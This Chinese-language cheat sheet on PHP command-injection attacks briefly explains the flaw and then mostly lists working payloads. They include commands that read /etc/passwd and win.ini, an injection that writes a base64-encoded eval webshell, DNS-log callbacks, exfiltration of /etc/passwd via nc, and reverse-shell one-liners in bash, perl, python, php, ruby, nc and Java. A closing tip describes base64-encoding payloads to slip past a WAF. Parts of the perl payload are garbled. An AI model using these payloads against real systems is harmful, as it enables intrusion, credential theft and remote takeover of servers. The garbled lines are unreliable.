应用程序中有时候需要调用一些执行系统命令的函数,在php中常见的为system、exec、shell_exec、passthru、proc_poen、popen等函数用来执行系统命令。当黑客能控制这些函数的参数时,就可以讲恶意的系统命令拼接到正常的命令中,就会命令执行攻击,这就是命令执行漏洞。
常用方法:
win 操作系统
type c:\windows\win.ini
linux 操作系统
cat /etc/passwd
|echo "PD9waHAgcGhwaW5mbygpO2V2YWwoJF9QT1NUWydjbWQnXSk/Pg=="|base64 -d >shell.php #base64解码后写入到shell.php文件中
查看是否可以访问
使用webshell工具连接
借助dnslog.cn查看访问
链接: http://dnslog.cn/
`whoami`.7w1v2u.dnslog.cn
利用原理与dnslog是一样的
复制dns地址
访问此地址
|ping -c 4 m1odth5coly60euvoihemfn5kwqnec.burpcollaborator.net
|nc 192.168.0.107 9999 </etc/passwd
nc -vlnp 8080
|/bin/bash -c 'bash -i >& /dev/tcp/192.168.0.107/8080 0>&1'
常用的shell反弹命令:
bash shell 执行
||/bin/bash -c ‘bash -i >& /dev/tcp/192.168.0.124/8080 0>&1’
perl -e ‘use
Socket; i = " 10.0.0.1 " ; i="10.0.0.1"; i="10.0.0.1";p=1234;socket(S,PF_INET,SOCK_STREAM,getprotobyname(
“tcp”));if(connect(S,sockaddr_in( p , i n e t a t o n ( p,inet_aton( p,inetaton(i)))){open(STDIN,“>&S”);open(STD
OUT,“>&S”);open(STDERR,“>&S”);exec(“/bin/sh -i”);};’
python -c ‘import
socket,subprocess,os;s=socket.socket(socket.AF_INET,socket.SOCK_STREAM);s.co
nnect((“10.0.0.1”,1234));os.dup2(s.fileno(),0); os.dup2(s.fileno(),1);
os.dup2(s.fileno(),2);p=subprocess.call([“/bin/sh”,“-i”]);’
php -r ‘$sock=fsockopen(“10.0.0.1”,1234);exec(“/bin/sh -i <&3 >&3 2>&3”);’
ruby -rsocket -e’f=TCPSocket.open(“10.0.0.1”,1234).to_i;exec sprintf(“/bin/sh -i
<&%d >&%d 2>&%d”,f,f,f)’
nc -e /bin/sh 10.0.0.1 1234
rm /tmp/f;mkfifo /tmp/f;cat /tmp/f|/bin/sh -i 2>&1|nc 10.0.0.1 1234 >/tmp/f
r = Runtime.getRuntime()
p = r.exec([“/bin/bash”,“-c”,“exec 5<>/dev/tcp/10.0.0.1/2002;cat <&5 | while read line;
do $line 2>&5 >&5; done”] as String[])
p.waitFor()
tips: 如果遇到waf连接可以把语句进行base64加密后输入